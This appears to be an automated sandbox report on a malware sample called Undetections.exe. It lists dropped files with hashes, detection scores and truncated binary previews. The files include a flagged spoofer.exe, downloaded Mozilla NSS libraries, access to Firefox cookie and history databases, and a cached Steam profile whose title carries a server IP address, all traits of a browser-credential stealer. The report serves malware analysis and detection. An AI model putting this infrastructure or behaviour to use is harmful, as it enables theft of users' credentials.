                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\nss3.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2046288
                                                                                                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\softokn3.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):257872
                                                                                                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):80880
                                                                                                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\spoofer.exe.log

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Undetections\spoofer.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):42
                                                                                                                                                                                                          Entropy (8bit):4.0050635535766075
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199662282318[1].htm

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):34667
                                                                                                                                                                                                          Entropy (8bit):5.431086328560938
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:57pqLtWY7wt5D0gqrgiNGA3Z4VWBCW3KI8iCfukPco1AU2Z4VWBCW3KI8iKh2Sw5:578LtWY7wt5D0gqrgc3Z4VWBCW3KI8ib
                                                                                                                                                                                                          MD5:0999C8EBA8870DAB83F16F7184652365
                                                                                                                                                                                                          SHA1:BDBFF8915B4FFDC0AD3C7A6BFF39C4C39DB831AC
                                                                                                                                                                                                          SHA-256:680562EDFF9D8195E4CC430B96CC842E4ACB8DDA9E711106FB08AF0E0F6A8AE3
                                                                                                                                                                                                          SHA-512:4F3379F1F9AADA0E838BED5D62FB27D4D0BCCEC10D2F4220D7A90F3A88FD0A254B57E89CA1B6E7325B605006E544BBFAFE826A5C8A53212B8CB7DEA3E0FE6373
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: i1il https://95.217.212.139|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.c

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2459136
                                                                                                                                                                                                          Entropy (8bit):6.052474106868353
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                                          MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                          SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                          SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                                          SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):685392
                                                                                                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):608080
                                                                                                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):450024
                                                                                                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2046288
                                                                                                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):257872
                                                                                                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):80880
                                                                                                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Undetections\spoofer.exe

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Undetections.exe
                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                          Size (bytes):219136
                                                                                                                                                                                                          Entropy (8bit):7.9785084518397795
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:8T79OcGMxZeY2fl8U0K++4gfhqF8WtxopwHkqIsSLFoTQp7imdJZAY+it6DcOS:zM5Uwga89wHbGOKp+u6DcO
                                                                                                                                                                                                          MD5:96EF850D149542B53F033375B1C50CC9
                                                                                                                                                                                                          SHA1:D1524ED874C286EF4169C588EA2F1F2B8C9993D9
                                                                                                                                                                                                          SHA-256:ABB5BA187C21034264CAE6AE84962B22C58CBB81442B059B9A0AFC3234182C7E
                                                                                                                                                                                                          SHA-512:CA79888198B1AA435CE2D6920068DD409804572D6058DBC68D8AB94983BF92749BA14A8ADB5A3AEA7CD3883A45EAA9298CF37DC6267AEA76473B1B119ED9F2AE
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^..........."...0..N...........3... ........@.. ....................................`.................................r3..O....................................2..8............................................ ............... ..H............text....L... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B.................3......H.......4$.................................................................]*....0..Z.........i. .......... .............+X.....-*....d....(......(....&..........o.......+....+.......(...........o....+....2...X.. ....2.....+7. ....... ..............XX.. ....]...................X.. ....2........8.......+o..X ....].....X ....]...........&.......... .....7.. ,.../............X ....]..........%G...o.........a.R...X......i2....X.....?w...*....................(....*n .........%....

                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\spoofer.zip

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\Undetections.exe
                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):215501
                                                                                                                                                                                                          Entropy (8bit):7.999152215046782
                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                          SSDEEP:3072:jEZiGytshOGMxZeYsfl8U0K++4gNhqF8WtxopwHkGIsSLFoTQpXimdJZAYPcQMIN:jEM1tGMXUwgM89wH5GSKpUQMu
                                                                                                                                                                                                          MD5:BDB906144FFDA9BA673FE3C368B7CA98
                                                                                                                                                                                                          SHA1:A2E4138852F896DB3D236D4FE7697B6047831D7D
                                                                                                                                                                                                          SHA-256:ECC493D02008E44809C035B42944FD41D67D55E4273E60C5585FABF60318885B
                                                                                                                                                                                                          SHA-512:5E6FB292937340D6758426F5BCABDB34D53DA29269324E1FE9CDCFCF1E13A834C213958677C33B576D3C69E62ED7F350380E284D08751744990DD11922F1AC0A
                                                                                                                                                                                                          Malicious:false
